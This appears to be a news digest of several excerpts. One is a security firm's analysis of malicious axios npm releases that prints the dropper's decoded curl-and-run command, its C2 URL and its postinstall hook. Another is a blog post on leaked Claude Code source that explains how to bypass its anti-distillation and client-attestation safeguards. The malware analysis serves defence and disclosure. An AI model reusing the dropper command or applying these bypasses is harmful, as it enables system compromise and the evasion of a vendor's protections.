10 interesting stories served every morning and every evening.
Every time any of LinkedIn’s one billion users visits linkedin.com, hidden code searches their computer for installed software, collects the results, and transmits them to LinkedIn’s servers and to third-party companies including an American-Israeli cybersecurity firm.
The user is never asked. Never told. LinkedIn’s privacy policy does not mention it.
Because LinkedIn knows each user’s real name, employer, and job title, it is not searching anonymous visitors. It is searching identified people at identified companies. Millions of companies. Every day. All over the world.
Fairlinked e. V. is an association of commercial LinkedIn users. We represent the professionals who use LinkedIn, the businesses that invest in and depend on the platform, and the toolmakers who build products for it.
BrowserGate is our investigation and campaign to document one of the largest corporate espionage and data breach scandals in digital history, to inform the public and regulators, to collect evidence, and to raise funds for the legal proceedings required to stop it.
LinkedIn’s scan reveals the religious beliefs, political opinions, disabilities, and job search activity of identified individuals. LinkedIn scans for extensions that identify practicing Muslims, extensions that reveal political orientation, extensions built for neurodivergent users, and 509 job search tools that expose who is secretly looking for work on the very platform where their current employer can see their profile.
Under EU law, this category of data is not regulated. It is prohibited. LinkedIn has no consent, no disclosure, and no legal basis. Its privacy policy does not mention any of this.
LinkedIn scans for over 200 products that directly compete with its own sales tools, including Apollo, Lusha, and ZoomInfo. Because LinkedIn knows each user’s employer, it can map which companies use which competitor products. It is extracting the customer lists of thousands of software companies from their users’ browsers without anyone’s knowledge.
Then it uses what it finds. LinkedIn has already sent enforcement threats to users of third-party tools, using data obtained through this covert scanning to identify its targets.
In 2023, the EU designated LinkedIn as a regulated gatekeeper under the Digital Markets Act and ordered it to open its platform to third-party tools. LinkedIn’s response:
It published two restricted APIs and presented them to the European Commission as compliance. Together, these APIs handle approximately 0.07 calls per second. Meanwhile, LinkedIn already operates an internal API called Voyager that powers every LinkedIn web and mobile product at 163,000 calls per second. In Microsoft’s 249-page compliance report to the EU, the word “API” appears 533 times. “Voyager” appears zero times.
At the same time, LinkedIn expanded its surveillance of the exact tools the regulation was designed to protect. The scan list grew from roughly 461 products in 2024 to over 6,000 by February 2026. The EU told LinkedIn to let third-party tools in. LinkedIn built a surveillance system to find and punish every user of those tools.
LinkedIn loads an invisible tracking element from HUMAN Security (formerly PerimeterX), an American-Israeli cybersecurity firm, zero pixels wide, hidden off-screen, that sets cookies on your browser without your knowledge. A separate fingerprinting script runs from LinkedIn’s own servers. A third script from Google executes silently on every page load. All of it encrypted. None of it disclosed.
Microsoft has 33,000 employees and a $15 billion legal budget. We have the evidence. What we need is people and funding to hold them accountable.
...
Read the original on browsergate.eu »
Hijacked maintainer account used to publish poisoned axios releases including 1.14.1 and 0.30.4. The attacker injected a hidden dependency that drops a cross platform RAT. We are actively investigating and will update this post with a full technical analysis. StepSecurity hosted a community town hall on this incident on April 1st at 10:00 AM PT - YouTube recording: https://youtu.be/3Hku_svFvosaxios is the most popular JavaScript HTTP client library with over 100 million weekly downloads. On March 30, 2026, StepSecurity identified two malicious versions of the widely used axios HTTP client library published to npm: axios@1.14.1 and axios@0.30.4. The malicious versions inject a new dependency, plain-crypto-js@4.2.1, which is never imported anywhere in the axios source code. Its sole purpose is to execute a postinstall script that acts as a cross platform remote access trojan (RAT) dropper, targeting macOS, Windows, and Linux. The dropper contacts a live command and control server and delivers platform specific second stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean version to evade forensic detection.If you have installed axios@1.14.1 or axios@0.30.4, assume your system is compromisedThere are zero lines of malicious code inside axios itself, and that’s exactly what makes this attack so dangerous. Both poisoned releases inject a fake dependency, plain-crypto-js@4.2.1, a package never imported anywhere in the axios source, whose sole purpose is to run a postinstall script that deploys a cross-platform remote access trojan. The dropper contacts a live command-and-control server, delivers separate second-stage payloads for macOS, Windows, and Linux, then erases itself and replaces its own package.json with a clean decoy. A developer who inspects their node_modules folder after the fact will find no indication anything went wrong.This was not opportunistic. It was precision. The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct. Within two seconds of npm install, the malware was already calling home to the attacker’s server before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package.These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers.StepSecurity Harden-Runner, whose community tier is free for public repos and is used by over 12,000 public repositories, detected the compromised axios package making anomalous outbound connections to the attacker’s C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. The Backstage team has confirmed that this workflow is intentionally sandboxed and the malicious package install does not impact the project. The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-events
[Community Webinar] axios Compromised on npm: What We Know, What You Should Do
Watch the StepSecurity community briefing on the axios supply chain attack. We walk through the full attack chain, indicators of compromise, remediation steps, and answer community questions.
Watch the recording on YouTube →
The attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid “brand-new package” alarms from security scanners:
plain-crypto-js@4.2.0 published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear as a zero-history account during later inspection.
plain-crypto-js@4.2.1 published by nrwise@proton.me — malicious payload added. The postinstall: “node setup.js” hook and obfuscated dropper are introduced.
axios@1.14.1 published by compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base.
axios@0.30.4 published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines.
npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. Timestamp is inferred from the axios registry document’s modified field (03:15:30Z) — npm does not expose a dedicated per-version unpublish timestamp in its public API.
npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub.
npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice.
The attacker compromised the jasonsaayman npm account, the primary maintainer of the axios project. The account’s registered email was changed to ifstap@proton.me — an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches simultaneously, maximizing the number of projects exposed.Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project’s normal GitHub Actions CI/CD pipeline.A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm’s OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token with no OIDC binding and no gitHead:// axios@1.14.0 — LEGITIMATE
“_npmUser”: {
“name”: “GitHub Actions”,
“email”: “npm-oidc-no-reply@github.com”,
“trustedPublisher”: {
“id”: “github”,
“oidcConfigId”: “oidc:9061ef30-3132-49f4-b28c-9338d192a1a9″
// axios@1.14.1 — MALICIOUS
“_npmUser”: {
“name”: “jasonsaayman”,
“email”: “ifstap@proton.me”
// no trustedPublisher, no gitHead, no corresponding GitHub commit or tag
}There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow — it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.Before publishing the malicious axios versions, the attacker pre-staged plain-crypto-js@4.2.1 from account nrwise@proton.me. This package:Masquerades as crypto-js with an identical description and repository URL pointing to the legitimate brix/crypto-js GitHub repositoryContains “postinstall”: “node setup.js” — the hook that fires the RAT dropper on installPre-stages a clean package.json stub in a file named package.md for evidence destruction after executionThe decoy version (4.2.0) was published 18 hours earlier to establish publishing history - a clean package in the registry that makes nrwise look like a legitimate maintainer.What changed between 4.2.0 (decoy) and 4.2.1 (malicious)A complete file-level comparison between plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 reveals exactly three differences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is identical between the two versions:
The 56 crypto source files are not just similar; they are bit-for-bit identical to the corresponding files in the legitimate crypto-js@4.2.0 package published by Evan Vosberg. The attacker made no modifications to the cryptographic library code whatsoever. This was intentional: any diff-based analysis comparing plain-crypto-js against crypto-js would find nothing suspicious in the library files and would focus attention on package.json — where the postinstall hook looks, at a glance, like a standard build or setup task.The anti-forensics stub (package.md) deserves particular attention. After setup.js runs, it renames package.md to package.json. The stub reports version 4.2.0 — not 4.2.1:// Contents of package.md (the clean replacement stub)
“name”: “plain-crypto-js”,
“version”: “4.2.0″, // ← reports 4.2.0, not 4.2.1 — deliberate mismatch
“description”: “JavaScript library of crypto standards.”,
“license”: “MIT”,
“author”: { “name”: “Evan Vosberg”, “url”: “http://github.com/evanvosberg” },
“homepage”: “http://github.com/brix/crypto-js”,
“repository”: { “type”: “git”, “url”: “http://github.com/brix/crypto-js.git” },
“main”: “index.js”,
// No “scripts” key — no postinstall, no test
“dependencies”: {}
}This creates a secondary deception layer. After infection, running npm list in the project directory will report plain-crypto-js@4.2.0 — because npm list reads the version field from the installed package.json, which now says 4.2.0. An incident responder checking installed packages would see a version number that does not match the malicious 4.2.1 version they were told to look for, potentially leading them to conclude the system was not compromised.# What npm list reports POST-infection (after the package.json swap):
$ npm list plain-crypto-js
myproject@1.0.0
└── plain-crypto-js@4.2.0 # ← reports 4.2.0, not 4.2.1
# but the dropper already ran as 4.2.1
# The reliable check is the DIRECTORY PRESENCE, not the version number:
$ ls node_modules/plain-crypto-js
aes.js cipher-core.js core.js …
# If this directory exists at all, the dropper ran.
# plain-crypto-js is not a dependency of ANY legitimate axios version.The difference between the real crypto-js@4.2.0 and the malicious plain-crypto-js@4.2.1 is a single field in package.json:// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)
“name”: “crypto-js”,
“version”: “4.2.0″,
“description”: “JavaScript library of crypto standards.”,
“author”: “Evan Vosberg”,
“homepage”: “http://github.com/brix/crypto-js”,
“scripts”: {
“test”: “grunt” // ← no postinstall
// plain-crypto-js@4.2.1 (MALICIOUS — nrwise@proton.me)
“name”: “plain-crypto-js”, // ← different name, everything else cloned
“version”: “4.2.1″, // ← version one ahead of the real package
“description”: “JavaScript library of crypto standards.”,
“author”: { “name”: “Evan Vosberg” }, // ← fraudulent use of real author name
“homepage”: “http://github.com/brix/crypto-js”, // ← real repo, wrong package
“scripts”: {
“test”: “grunt”,
“postinstall”: “node setup.js” // ← THE ONLY DIFFERENCE. The entire weapon.
}The attacker published axios@1.14.1 and axios@0.30.4 with plain-crypto-js: “^4.2.1” added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js’s postinstall script, launching the dropper.Phantom dependency: A grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()’d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook. A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.The Surgical Precision of the InjectionA complete binary diff between axios@1.14.0 and axios@1.14.1 across all 86 files (excluding source maps) reveals that exactly one file changed: package.json. Every other file — all 85 library source files, type definitions, README, CHANGELOG, and compiled dist bundles — is bit-for-bit identical between the two versions.# File diff: axios@1.14.0 vs axios@1.14.1 (86 files, source maps excluded)
DIFFERS: package.json
Total differing files: 1
Files only in 1.14.1: (none)
Files only in 1.14.0: (none)# –- axios/package.json (1.14.0)
# +++ axios/package.json (1.14.1)
- “version”: “1.14.0″,
+ “version”: “1.14.1″,
“scripts”: {
“fix”: “eslint –fix lib/**/*.js”,
- “prepare”: “husky”
“dependencies”: {
“follow-redirects”: “^2.1.0″,
“form-data”: “^4.0.1″,
“proxy-from-env”: “^2.1.0″,
+ “plain-crypto-js”: “^4.2.1″
}Two changes are visible: the version bump (1.14.0 → 1.14.1) and the addition of plain-crypto-js. There is also a third, less obvious change: the “prepare”: “husky” script was removed. husky is the git hook manager used by the axios project to enforce pre-commit checks. Its removal from the scripts section is consistent with a manual publish that bypassed the normal development workflow — the attacker edited package.json directly without going through the project’s standard release tooling, which would have re-added the husky prepare script.The same analysis applies to axios@0.30.3 → axios@0.30.4:# –- axios/package.json (0.30.3)
# +++ axios/package.json (0.30.4)
- “version”: “0.30.3″,
+ “version”: “0.30.4″,
“dependencies”: {
“follow-redirects”: “^1.15.4″,
“form-data”: “^4.0.4″,
“proxy-from-env”: “^1.1.0″,
+ “plain-crypto-js”: “^4.2.1″
}Again — exactly one substantive change: the malicious dependency injection. The version bump itself (from 0.30.3 to 0.30.4) is simply the required npm version increment to publish a new release; it carries no functional significance.setup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers.All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:_trans_1(x, r) — XOR cipher. The key “OrDeR_7077” is parsed through JavaScript’s Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as:charCode XOR key[(7 × r × r) % 10] XOR 333_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.The dropper’s entry point is _entry(“6202033″), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:stq[0] → “child_process” // shell execution
stq[1] → “os” // platform detection
stq[2] → “fs” // filesystem operations
stq[3] → “http://sfrclak.com:8000/” // C2 base URL
stq[5] → “win32” // Windows platform identifier
stq[6] → “darwin” // macOS platform identifier
stq[12] → “curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &”
stq[13] → “package.json” // deleted after execution
stq[14] → “package.md” // clean stub renamed to package.json
stq[15] → ”.exe”
stq[16] → ”.ps1″
stq[17] → ”.vbs”The complete attack path from npm install to C2 contact and cleanup, across all three target platforms.With all strings decoded, the dropper’s full logic can be reconstructed and annotated. The following is a de-obfuscated, commented version of the _entry() function that constitutes the entire dropper payload. Original variable names are preserved; comments are added for clarity.// setup.js — de-obfuscated and annotated
// SHA-256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
...
Read the original on www.stepsecurity.io »
Our most intelligent open models, built from Gemini 3 research and technology to maximize intelligence-per-parameter
Your browser does not support the video tag. Your browser does not support the video tag. A new level of intelligence for mobile and IoT devices Your browser does not support the video tag. Your browser does not support the video tag. Your browser does not support the video tag. Your browser does not support the video tag.A new level of intelligence for mobile and IoT devices Your browser does not support the video tag. Your browser does not support the video tag.
Build autonomous agents that plan, navigate apps, and complete tasks on your behalf, with native support for function calling. Develop applications with strong audio and visual understanding, for rich multimodal support.Create multilingual experiences that go beyond translation and understand cultural context.Improve performance for specific tasks by training Gemma using your preferred frameworks and techniques.Run models on your own hardware for efficient development and deployment.
A new level of intelligence for mobile and IoT devicesAudio and vision support for real-time edge processing. They can run completely offline with near-zero latency on edge devices like phones, Raspberry Pi, and Jetson Nano.
Advanced reasoning for IDEs, coding assistants, and agentic workflows. These models are optimized for consumer GPUs — giving students, researchers, and developers the ability to turn workstations into local-first AI servers.
Gemma 4 models undergo the same rigorous infrastructure security protocols as our proprietary models. By choosing Gemma 4, enterprises and sovereign organizations gain a trusted, transparent foundation that delivers state-of-the-art capabilities while meeting the highest standards for security and reliability.
...
Read the original on deepmind.google »
After a team member summoned Copilot to correct a typo in a PR of mine, Copilot edited my PR description to include and ad for itself and Raycast.
This is horrific. I knew this kind of bullshit would happen eventually, but I didn’t expect it so soon.
Here is how platforms die: first, they are good to their users; then they abuse their users to make things better for their business customers; finally, they abuse those business customers to claw back all the value for themselves. Then, they die.
...
Read the original on notes.zachmanson.com »
Update: see HN discussions about this post: https://news.ycombinator.com/item?id=47586778
I use Claude Code daily, so when Chaofan Shou noticed earlier today that Anthropic had shipped a .map file alongside their Claude Code npm package, one containing the full, readable source code of the CLI tool, I immediately wanted to look inside. The package has since been pulled, but not before the code was widely mirrored, including myself and picked apart on Hacker News.
This is Anthropic’s second accidental exposure in a week (the model spec leak was just days ago), and some people on Twitter are starting to wonder if someone inside is doing this on purpose. Probably not, but it’s a bad look either way. The timing is hard to ignore: just ten days ago, Anthropic sent legal threats to OpenCode, forcing them to remove built-in Claude authentication because third-party tools were using Claude Code’s internal APIs to access Opus at subscription rates instead of pay-per-token pricing. That whole saga makes some of the findings below more pointed.
So I spent my morning reading through the HN comments and leaked source. Here’s what I found, roughly ordered by how “spicy” I thought it was.
In claude.ts (line 301-313), there’s a flag called ANTI_DISTILLATION_CC. When enabled, Claude Code sends anti_distillation: [‘fake_tools’] in its API requests. This tells the server to silently inject decoy tool definitions into the system prompt.
The idea: if someone is recording Claude Code’s API traffic to train a competing model, the fake tools pollute that training data. It’s gated behind a GrowthBook feature flag (tengu_anti_distill_fake_tool_injection) and only active for first-party CLI sessions.
This was one of the first things people noticed on HN.
There’s also a second anti-distillation mechanism in betas.ts (lines 279-298), server-side connector-text summarization. When enabled, the API buffers the assistant’s text between tool calls, summarizes it, and returns the summary with a cryptographic signature. On subsequent turns, the original text can be restored from the signature. If you’re recording API traffic, you only get the summaries, not the full reasoning chain.
How hard would it be to work around these? Not very. Looking at the activation logic in claude.ts, the fake tools injection requires all four conditions to be true: the ANTI_DISTILLATION_CC compile-time flag, the cli entrypoint, a first-party API provider, and the tengu_anti_distill_fake_tool_injection GrowthBook flag returning true. A MITM proxy that strips the anti_distillation field from request bodies before they reach the API would bypass it entirely, since the injection is server-side and opt-in. The shouldIncludeFirstPartyOnlyBetas() function also checks for CLAUDE_CODE_DISABLE_EXPERIMENTAL_BETAS, so setting that env var to a truthy value disables the whole thing. And if you’re using a third-party API provider or the SDK entrypoint instead of the CLI, the check never fires at all. The connector-text summarization is even more narrowly scoped, Anthropic-internal-only (USER_TYPE === ‘ant’), so external users won’t encounter it regardless.
Anyone serious about distilling from Claude Code traffic would find the workarounds in about an hour of reading the source. The real protection is probably legal, not technical.
The file undercover.ts (about 90 lines) implements a mode that strips all traces of Anthropic internals when Claude Code is used in non-internal repos. It instructs the model to never mention internal codenames like “Capybara” or “Tengu,” internal Slack channels, repo names, or the phrase “Claude Code” itself.
“There is NO force-OFF. This guards against model codename leaks.”
You can force it ON with CLAUDE_CODE_UNDERCOVER=1, but there’s no way to force it off. In external builds, the entire function gets dead-code-eliminated to trivial returns. This is a one-way door.
This means AI-authored commits and PRs from Anthropic employees in open source projects will have no indication that an AI wrote them. Hiding internal codenames is reasonable. Having the AI actively pretend to be human is a different thing.
An LLM company using regexes for sentiment analysis is peak irony, but also: a regex is faster and cheaper than an LLM inference call just to check if someone is swearing at your tool.
In system.ts (lines 59-95), API requests include a cch=00000 placeholder. Before the request leaves the process, Bun’s native HTTP stack (written in Zig) overwrites those five zeros with a computed hash. The server then validates the hash to confirm the request came from a real Claude Code binary, not a spoofed one.
They use a placeholder of the same length so the replacement doesn’t change the Content-Length header or require buffer reallocation. The computation happens below the JavaScript runtime, so it’s invisible to anything running in the JS layer. It’s basically DRM for API calls, implemented at the HTTP transport level.
This is the technical enforcement behind the OpenCode legal fight. Anthropic doesn’t just ask third-party tools not to use their APIs; the binary itself cryptographically proves it’s the real Claude Code client. If you’re wondering why the OpenCode community had to resort to session-stitching hacks and auth plugins after Anthropic’s legal notice, this is why.
The attestation isn’t airtight, though. The whole mechanism is gated behind a compile-time feature flag (NATIVE_CLIENT_ATTESTATION), and the cch=00000 placeholder only gets injected into the x-anthropic-billing-header when that flag is on. The header itself can be disabled entirely by setting CLAUDE_CODE_ATTRIBUTION_HEADER to a falsy value, or remotely via a GrowthBook killswitch (tengu_attribution_header). The Zig-level hash replacement also only works inside the official Bun binary. If you rebuilt the JS bundle and ran it on stock Bun (or Node), the placeholder would survive as-is: five literal zeros hitting the server. Whether the server rejects that outright or just logs it is an open question, but the code comment references a server-side _parse_cc_header function that “tolerates unknown extra fields,” which suggests the validation might be more forgiving than you’d expect for a DRM-like system. Not a push-button bypass, but not the kind of thing that would stop a determined third-party client for long either.
“BQ 2026-03-10: 1,279 sessions had 50+ consecutive failures (up to 3,272) in a single session, wasting ~250K API calls/day globally.”
The fix? MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3. After 3 consecutive failures, compaction is disabled for the rest of the session. Three lines of code to stop burning a quarter million API calls a day.
Throughout the codebase, there are references to a feature-gated mode called KAIROS. Based on the code paths in main.tsx, it looks like an unreleased autonomous agent mode that includes:
This is probably the biggest product roadmap reveal from the leak.
The implementation is heavily gated, so who knows how far along it is. But the scaffolding for an always-on, background-running agent is there.
Tomorrow is April 1st, and the source contains what’s almost certainly this year’s April Fools’ joke: buddy/companion.ts implements a Tamagotchi-style companion system. Every user gets a deterministic creature (18 species, rarity tiers from common to legendary, 1% shiny chance, RPG stats like DEBUGGING and SNARK) generated from their user ID via a Mulberry32 PRNG. Species names are encoded with String.fromCharCode() to dodge build-system grep checks.
The terminal rendering in ink/screen.ts and ink/optimizer.ts borrows game-engine techniques: an Int32Array-backed ASCII char pool, bitmask-encoded style metadata, a patch optimizer that merges cursor moves and cancels hide/show pairs, and a self-evicting line-width cache (the source claims “~50x reduction in stringWidth calls during token streaming”). Seems like overkill until you remember these things stream tokens one at a time.
Every bash command runs through 23 numbered security checks in bashSecurity.ts: 18 blocked Zsh builtins, defense against Zsh equals expansion (=curl bypassing permission checks for curl), unicode zero-width space injection, IFS null-byte injection, and a malformed token bypass found during HackerOne review. I haven’t seen another tool with this specific a Zsh threat model.
Prompt cache economics clearly drive a lot of the architecture. promptCacheBreakDetection.ts tracks 14 cache-break vectors, and there are “sticky latches” that prevent mode toggles from busting the cache. One function is annotated DANGEROUS_uncachedSystemPromptSection(). When you’re paying for every token, cache invalidation stops being a computer science joke and becomes an accounting problem.
The multi-agent coordinator in coordinatorMode.ts is interesting because the orchestration algorithm is a prompt, not code. It manages worker agents through system prompt instructions like “Do not rubber-stamp weak work” and “You must understand findings before directing follow-up work. Never hand off understanding to another worker.”
The codebase also has some rough spots. print.ts is 5,594 lines long with a single function spanning 3,167 lines and 12 levels of nesting. They use Axios for HTTP, which is funny timing given that Axios was just compromised on npm with malicious versions dropping a remote access trojan.
Some people are downplaying this because Google’s Gemini CLI and OpenAI’s Codex are already open source. But those companies open-sourced their agent SDK (a toolkit), not the full internal wiring of their flagship product.
The real damage isn’t the code. It’s the feature flags. KAIROS, the anti-distillation mechanisms: these are product roadmap details that competitors can now see and react to. The code can be refactored. The strategic surprise can’t be un-leaked.
And here’s the kicker: Anthropic acquired Bun at the end of last year, and Claude Code is built on top of it. A Bun bug (oven-sh/bun#28001), filed on March 11, reports that source maps are served in production mode even though Bun’s own docs say they should be disabled. The issue is still open. If that’s what caused the leak, then Anthropic’s own toolchain shipped a known bug that exposed their own product’s source code.
As one Twitter reply put it: “accidentally shipping your source map to npm is the kind of mistake that sounds impossible until you remember that a significant portion of the codebase was probably written by the AI you are shipping.”
...
Read the original on alex000kim.com »
I’ve taken agency in the treatment of my bone cancer (osteosarcoma in the T5 vertebrae of the upper spine). After I’ve ran out of standard of care treatment options and there were no trials available for me I’ve started doing: maximum diagnostics, created new treatments, started doing treatments in parallel, and scaling this for others.
Elliot Hershberg wrote a great and extensive article about my cancer journey.
My cancer journey deck is embedded below, there also is a recording of an OpenAI Forum presentation. The companies we are building to scale this approach for others can be found at evenone.ventures. Please scroll further on this page for my data and other information.
I think the medical industry can be more patient first, see this great article by Ruxandra https://www.writingruxandrabio.com/p/the-bureaucracy-blocking-the-chance
For my data please see https://osteosarc.com/ that includes my treatment timeline and a data overview doc with 25TB of publicly readable Google Cloud buckets.
Please subscribe to my mailing list
...
Read the original on sytse.com »
This is the first of a series of articles in which you will learn about what may be one of the silliest, most preventable, and most costly mishaps of the 21st century, where Microsoft all but lost OpenAI, its largest customer, and the trust of the US government.
I joined Azure Core on the dull Monday morning of May 1st, 2023, as a senior member of the Overlake R&D team, the folks behind the Azure Boost offload card and network accelerator.
I wasn’t new to Azure, having run what is likely the longest-running production subscription of this cloud service, which launched in February 2010 as Windows Azure.
I wasn’t new to Microsoft either, having been part of the Windows team since 1/1/2013 and later helped migrate SharePoint Online to Azure, before joining the Core OS team as a kernel engineer, where I notably helped improve the kernel and helped invent and deliver the Container platform that supports Docker, Azure Kubernetes, Azure Container Instances, Azure App Services, and Windows Sandbox, all shipping technologies that resulted in multiple granted patents.
Furthermore, I contributed to brainstorming the early Overlake cards in 2020-2021, drafting a proposal for a Host OS Accelerator Card communication protocol and network stack, when all we had was a debugger’s serial connection. I also served as a Core OS specialist, helping Azure Core engineers diagnose deep OS issues.
I rejoined in 2023 as an Azure expert on day one, having contributed to the development of some of the technologies on which Azure relies and having used the platform for more than a decade, both outside and inside Microsoft at a global scale.
As a returning employee, I skipped the New Employee Orientation and had my Global Security invite for 12 noon to pick up my badge, but my future manager asked if I could come in earlier, as the team had their monthly planning meeting that morning.
I, of course, agreed and arrived a few minutes before 10 am at the entrance of the Studio X building, not far from The Commons on the West Campus in Redmond. A man showed up in the lobby and opened the door for me. I followed him to a meeting room through a labyrinth of corridors.
The room was chock-full, with more people on a live conference call. The dev manager, the leads, the architects, the principal and senior engineers shared the space with what appeared to be new hires and junior personnel.
The screen projected a slide where I recognized a number of familiar acronyms, like COM, WMI, perf counters, VHDX, NTFS, ETW, and a dozen others, mixed with new Azure-related ones, in an imbroglio of boxes linked by arrows.
I sat quietly at the back while a man was walking the room through a big porting plan of their current stack to the Overlake accelerator. As I listened, it was not immediately clear what that series of boxes with Windows user-mode and kernel components had to do with that plan.
After a few minutes, I risked a question: Are you planning to port those Windows features to Overlake? The answer was yes, or at least they were looking into it. The dev manager showed some doubt, and the man replied that they could at least “ask a couple of junior devs to look into it.”
The room remained silent for an instant. I had seen the hardware specs for the SoC on the Overlake card in my previous tenure: the RAM capacity and the power budget, which was just a tiny fraction of the TDP you can expect from a regular server CPU.
The hardware folks I had spoken with told me they could only spare 4KB of dual-ported memory on the FPGA for my doorbell shared-memory communication protocol.
Everything was nimble, efficient, and power-savvy, and the team I had joined 10 minutes earlier was seriously considering porting half of Windows to that tiny, fanless, Linux-running chip the size of a fingernail.
That felt like Elon talking about colonizing Mars: just nuke the poles then grow an atmosphere! Easier said than done, uh?
That entire 122-strong org was knee-deep in impossible ruminations involving porting Windows to Linux to support their existing VM management agents.
The man was a Principal Group Engineering Manager overseeing a chunk of the software running on each Azure node; his boss, a Partner Engineering Manager, was in the room with us, and they really contemplated porting Windows to Linux to support their current software.
At first, I questioned my understanding. Was that serious? The rest of the talk left no doubt: the plan was outlined, and the dev leads were tasked with contributing people to the effort. It was immediately clear to me that this plan would never succeed and that the org needed a lot of help.
That first hour in the new role left me with a mix of strange feelings, stupefaction, and incredulity.
The stack was hitting its scaling limits on a 400 Watt Xeon at just a few dozen VMs per node, I later learned, a far cry from the 1,024 VMs limit I knew the hypervisor was capable of, and was a noisy neighbor consuming so many resources that it was causing jitter observable from the customer VMs.
There is no dimension in the universe where this stack would fit on a tiny ARM SoC and scale up by many factors. It was not going to happen.
I have seen a lot in my decades of industry (and Microsoft) experience, but I had never seen an organization so far from reality. My day-one problem was therefore not to ramp up on new technology, but rather to convince an entire org, up to my skip-skip-level, that they were on a death march.
Somewhere, I knew it was going to be a fierce uphill battle. As you can imagine, it didn’t go well, as you will later learn.
I spent the next few days reading more about the plans, studying the current systems, and visiting old friends in Core OS, my alma mater. I was lost away from home in a bizarre territory where people made plans that didn’t make sense with the aplomb of a drunk LLM.
I notably spent more than 90 minutes chatting in person with the head of the Linux System Group, a solid scholar with a PhD from INRIA, who was among the folks who hired me on the kernel team years earlier.
His org is responsible for delivering Mariner Linux (now Azure Linux) and the trimmed-down distro running on the Overlake / Azure Boost card. He kindly answered all my questions, and I learned that they had identified 173 agents (one hundred seventy-three) as candidates for porting to Overlake.
I later researched this further and found that no one at Microsoft, not a single soul, could articulate why up to 173 agents were needed to manage an Azure node, what they all did, how they interacted with one another, what their feature set was, or even why they existed in the first place.
Azure sells VMs, networking, and storage at the core. Add observability and servicing, and you should be good. Everything else, SQL, K8s, AI workloads, and whatnot all build on VMs with xPU, networking, and storage, and the heavy lifting to make the magic happen is done by the good Core OS folks and the hypervisor.
How the Azure folks came up with 173 agents will probably remain a mystery, but it takes a serious amount of misunderstanding to get there, and this is also how disasters are built.
Now, fathom for a second that this pile of uncontrolled “stuff” is orchestrating the VMs running Anthropic’s Claude, what’s left of OpenAI’s APIs on Azure, SharePoint Online, the government clouds and other mission-critical infrastructure, and you’ll be close to understanding how a grain of sand in that fragile pileup can cause a global collapse, with serious National Security implications as well as potential business-ending consequences for Microsoft.
We are still far from the vaporized trillion in market cap, my letters to the CEO, to the Microsoft Board of Directors, and to the Cloud + AI EVP and their total silence, the quasi-loss of OpenAI, the breach of trust with the US government as publicly stated by the Secretary of Defense, the wasted engineering efforts, the Rust mandate, my stint on the OpenAI bare-metal team in Azure Core, the escort sessions from China and elsewhere, and the delayed features publicly implied as shipping since 2023, before the work even began.
